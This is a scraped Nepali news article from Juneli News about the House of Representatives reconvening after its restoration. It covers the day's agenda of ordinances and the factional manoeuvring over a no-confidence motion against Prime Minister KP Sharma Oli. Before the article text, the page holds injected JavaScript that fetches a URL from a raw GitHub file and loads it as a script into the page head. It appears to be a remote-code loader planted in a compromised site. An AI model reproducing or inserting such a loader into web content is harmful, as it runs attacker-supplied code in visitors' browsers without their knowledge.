;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); प्रतिनिधिसभाको बैठक आज बस्दै – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • प्रतिनिधिसभाको बैठक आज बस्दै
जुनेली बिशेष

प्रतिनिधिसभाको बैठक आज बस्दै

फागुन २३,

काठमाडौं । आज प्रतिनिधिसभाको बैठक बस्दै छ ।  राष्ट्रपति बिधादेवी भण्डारीको आह्वनमा आइतबार अपरान्ह ४ : ०० बजेको लागि प्रतिनिधिसभाको हिउँदे अधिवेशन डाकिएको छ ।

प्रतिनिधि सभा पुःस्थापनापछि पहिलो पटक संसद् बैठक डाकिएको हो । सर्वोच्च आदालतले प्रधानमन्त्री केपी शर्मा ओलीको सिपारिसमा राष्ट्रपति बिधादेवी भण्डारीले गत पुष ५ गते बिघटित् गरेको संसद् फागुन ११ गते पुःनस्थापना गरेको छ ।

मन्त्रिपरिषद्को सिफारिसअनुसार राष्ट्रपति भण्डारीले २३ गते दिउँसो ४ बजेको लागि बैठक आह्वान गरेकि हुन् ।

आज बैठक सबैले चासोका साथ हेरेका छन्। सत्तारुढ दल नै दुई गुटमा विभाजन भइरहेको अवस्थामा सरकार र नेकपाकै अर्को गुट कसरी प्रस्तुत हुन्छ भन्ने विषय सबैको चासो बनेको हो।

बैठकमा सभामुखले राष्ट्रपतिबाट प्राप्त अधिवेशन आह्वान सम्बन्धी पत्रको व्यहोरा पढेर सुनाउने, त्यस्तै राष्ट्रपतिको कार्यालयबाट प्राप्त मन्त्रिपरिषद् गठन सम्बन्धी पत्रहरूको व्यहोरा पढेर सुनाउने कार्यतालिका छन्।

सभामुखले प्रतिनिधिसभा नियमावली, २०७५ को नियम १० को उपनियम (१) बमोजिम अध्यक्षता गर्ने सदस्यहरूको मनोनयन गर्नेछन्। त्यस्तै, प्रधानमन्त्री केपी शर्मा ओलीले संवैधानिक परिषद् (काम, कर्तव्य र अधिकार कार्यविधि) सम्बन्धी (पहिलो संशोधन) अध्यादेश, २०७७” पेश गर्नेछन्।

गृहमन्त्री रामबहादुर थापाले विभिन्न अध्यादेशहरू पेश गर्ने कार्यसूची रहेको संसद् सचिवालयले जनाएको छ। नेपाल प्रहरी र प्रदेश प्रहरी (कार्य सञ्चालन, सुपरिवेक्षण र समन्वय) (पहिलो संशोधन)अध्यादेश, २०७७, सामाजिक सुरक्षा (पहिलो संशोधन) अध्यादेश, २०७७, तेजाब तथा अन्य घातक रासायनिक पदार्थ (नियमन) अध्यादेश, २०७७, स्वास्थ्य तथा जनसंख्या मन्त्री हृदयेश त्रिपाठीले औषधी (तेस्रो संशोधन) अध्यादेश, २०७७ पेश गर्ने कार्यसूची रहेको छ।

त्यस्तै, कानून, न्याय तथा संसदीय मामिला मन्त्री लीलानाथ श्रेष्ठले पनि विभिन्न अध्यादेशहरू पेश गर्ने कार्यसूची रहेको छ। फौजदारी कसुर तथा फौजदारी कार्यविधिसम्बन्धी केही ऐन संशोधन गर्ने अध्यादेश, २०७७, यौन हिंसाविरुद्धका केही ऐनलाई संशोधन गर्ने अध्यादेश, २०७७, बेपत्ता पारिएका व्यक्तिको छानविन, सत्य निरुपण तथा मेलमिलाप आयोग (तेस्रो संशोधन) अध्यादेश, २०७७ उनले पेश गर्नेछन्।

यसै गरी, सभामुखले शोक प्रस्तावसमेत पेश गर्ने कार्यसूची रहेको संसद् सचिवालयका महासचिव डाक्टर भरतराज गौतमले जारी गरेको कार्यसूचीमा उल्लेख गरिएको छ।

सत्ताको जोड घटाउ र रणनीति

अधिवेशन अघि विशेषगरी नेकपाका दुबै समूह सत्ताको जोड घटाउमा व्यस्त छन्। प्रचण्ड नेपाल समूहले बैठक अघि नै प्रधानमन्त्री केपी शर्मा ओलीविरुद्ध अविश्वास प्रस्ताव दर्ता गर्ने तयारी गरिरहेको छ। यसअघि नै दर्ता भएको अविश्वास प्रस्ताव अघि बढाउन सभामुख तयार भए अर्को प्रस्ताव नलैजाने यो समूहको दाबी छ। यदि पुरानो प्रस्ताव अघि नबढे नयाँ प्रस्ताव लैजाने गरी तयारी भइरहेको प्रचण्ड नेपाल समूहका नेताले बताए।

सकेसम्म कांग्रेस र जनता समाजवादी पार्टीसँग मिलेर संयुक्त रुपमा प्रस्ताव लैजाने उसको तयारी छ। तर कांग्रेसले भने संयुक्त प्रस्ताव लैजान अहिलेसम्म सहमति जनाइसकेको छैन। कांग्रेस नेताहरुले संयुक्त प्रस्तावमा सहमति नजनाए पनि प्रचण्ड–नेपाल समूहलाई सहयोग गर्ने आश्वासन दिएको एक नेताको दाबी छ। तर बैठक अघि सम्म संयुक्त प्रस्ताव बनाउन प्रयास गर्ने ती नेता बताउँछन्।

अविश्वास प्रस्ताव आए कसरी सामना गर्ने भन्नेमा ओली समूहले पनि आन्तरिक तयारी गरिरहेको छ। उसले शनिबार संसदीय दलको बैठक बोलाएर आफ्ना सांसदलाई प्रस्तावको सामना गर्नेगरी अघि बढ्न निर्देशन समेत दिएको छ।

प्रतिनिधिसभामा सभामुख सबैभन्दा शक्तिशाली हुने भएकाले बैठक कसरी अघि बढ्छ भनेर अहिले नै आंकलन गर्न कठिन देखिएको छ । सभामुख अग्नि सापकोटाले यसअघि दर्ता भएको अविश्वास प्रस्ताव के गर्ने भनेर कानुनी परामर्ष गरिरहेका छन्। सत्तारुढ नेकपा दुई चिरामा बाँडिए पनि संसद्मा भने दुबै समूहलाई सत्तापक्षकै बेन्चमा बस्ने गरी व्यवस्था मिलाइएको छ।

नेकपा कानूनी रुपमा विभाजन नभएकाले सबै सांसद सत्तापक्षकै बेन्चमा बस्नु पर्ने भएको हो। कोरोना महामारीको कारण देखाउँदै यसअघि बजेट अधिवेशन छोटो समयमा नै अन्त्य गरिएको थियो। अधिवेशन लामो समय नचल्दा सङ्घीय संसद्मा विधेयकको चाप छ । सङ्घीय संसद्को पहिलो अधिवेशनदेखि गत पुस ५ गतेसम्म १ सय २८ विधेयक दर्ता भएका छन्। ति मध्ये दुवै सदनबाट पारित भई ६९ वटा विधेयक मात्रै ऐन बनेका छन्। सङ्घीय संसद्का दुवै सदनमा गरी आठवटा सन्धि तथा सम्झौता विचाराधीन छन्। तर यो पटक अधिवेशन विधेयकमा भन्दा भावी सत्ता समीकरणमा केन्द्रीत हुने देखिएको छ।

 

Image

फेसबुक प्रतिक्रियाहरु